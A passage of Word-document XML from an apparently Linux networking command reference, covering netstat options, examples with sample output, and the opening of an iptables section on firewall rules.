      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="2DBD2D98" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B5C8C6D"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a, --all</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="68841241" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Show all connections and listening ports</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="15E843B8" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D8ADBDC"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t, --tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6321773D" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Show TCP connections</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="02DF259A" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A7A942F"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u, --udp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B93743E" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Show UDP connections</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="5B680656" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45B22577"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l, --listening</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E5419A0" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Show only listening ports</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="71A58FE8" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="40C7EAB5"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n, --numeric</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5083F6F2" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Show numerical addresses instead of resolving hosts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="5A5D94DC" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="778EA9FE"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p, --programs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="371C7913" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Show PID and name of programs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="2F88FF37" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="53249649"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c, --continuous</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3DA64A9B" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Continuous listing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="7C8BA2E0" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="35B3B1D4"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e, --extend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="49B9EB7B" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Display extended information</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="6EBEC4A5" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13F4595F"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r, --route</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20155DDE" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Display routing table</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="4F2D9AA0" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="278AD438"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i, --interfaces</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13FC3FF0" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Display interface table</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="6E6E02FF" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2391CE0F"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g, --groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B9AD870" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Display multicast group memberships</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="28B7D892" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D75E754"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s, --statistics</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F382A33" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Display networking statistics</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="2B5D72B6" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2FFC1E33"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M, --masquerade</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="761F571A" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Display masqueraded connections</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="15289305" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B068A1B"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v, --verbose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04ED0D6C" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Verbose output</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="5A0C1EA2" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="509CF5CA"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W, --wide</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="308E3175" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Don't truncate IP addresses</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="63750B1A" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E00117C"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x, --unix</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03AB735B" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Show Unix domain sockets</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="5F1FC565" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C37C242"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o, --timers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22242157" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Display timers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="487E94A1" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60E495C5"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F, --fib</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C529DDA" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Display Forwarding Information Base</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="3F439B9F" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B18B590"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C, --cache</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3DFA1D52" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Display routing cache</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="596544B7" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1FB5EB85"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lastRenderedPageBreak/>
              <w:t>-Z, --context</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21190F1B" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Display SELinux security context</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="2DF050E8" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D0A0C61"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T, --notrim</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2589AE4C" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Stop trimming long addresses</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="316DE75F" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="775CB011"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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="39DB6992" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Show IPv4 only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="007CB747" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6051FF7A" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C00000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C00000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
              </w:rPr>
              <w:t>-6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44C2CE9A" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Show IPv6 only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4B8FBD4A" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Examples and Use Cases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645D96F3" w14:textId="110E42B3" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Show all listening ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7574D02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etstat -tuln</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D615264" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A2760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Active Internet connections (only servers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2897EBFA"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Proto Recv-Q Send-Q Local Address           Foreign Address         State</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6744971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cp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D64E27C"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cp        0      0 127.0.0.1:631           0.0.0.0:*               LISTEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3251916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cp6       0      0 :::22                   :::*                    LISTEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E44EF64"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udp        0      0 0.0.0.0:68              0.0.0.0:*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A0C5A4" w14:textId="40E105B5" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Show routing table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CAF73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etstat -rn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7B2CF5" w14:textId="66D9D1EE" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Show interface statistics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C78988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etstat -i</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298077F8" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4087216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Kernel Interface table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B199B74"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Iface      MTU    RX-OK RX-ERR RX-DRP RX-OVR    TX-OK TX-ERR TX-DRP TX-OVR Flg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406D709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eth0      1500    12845      0      0 0          8967      0      0      0 BMRU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4185BE61"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lo       65536      234      0      0 0           234      0      0      0 LRU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E99D479" w14:textId="78054803" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Firewall and Security Commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E78EAF8" w14:textId="4FFBA122" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>iptables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDB01BC" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        </w:rPr>
        <w:t>iptables</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve"> command configures the Linux kernel firewall.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDE7ABC" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Purpose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45177EA6" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:t>Configure netfilter firewall rules for packet filtering, NAT, and port forwarding.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316285FD" w14:textId="2305571E" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Syntax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBB130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iptables [options] [chain] [rule-specification]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D5BE66" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Common Options</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2757"/>
        <w:gridCol w:w="5905"/>
      </w:tblGrid>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="78F625F5" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1CF61424" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Option</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="276F6EB0" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
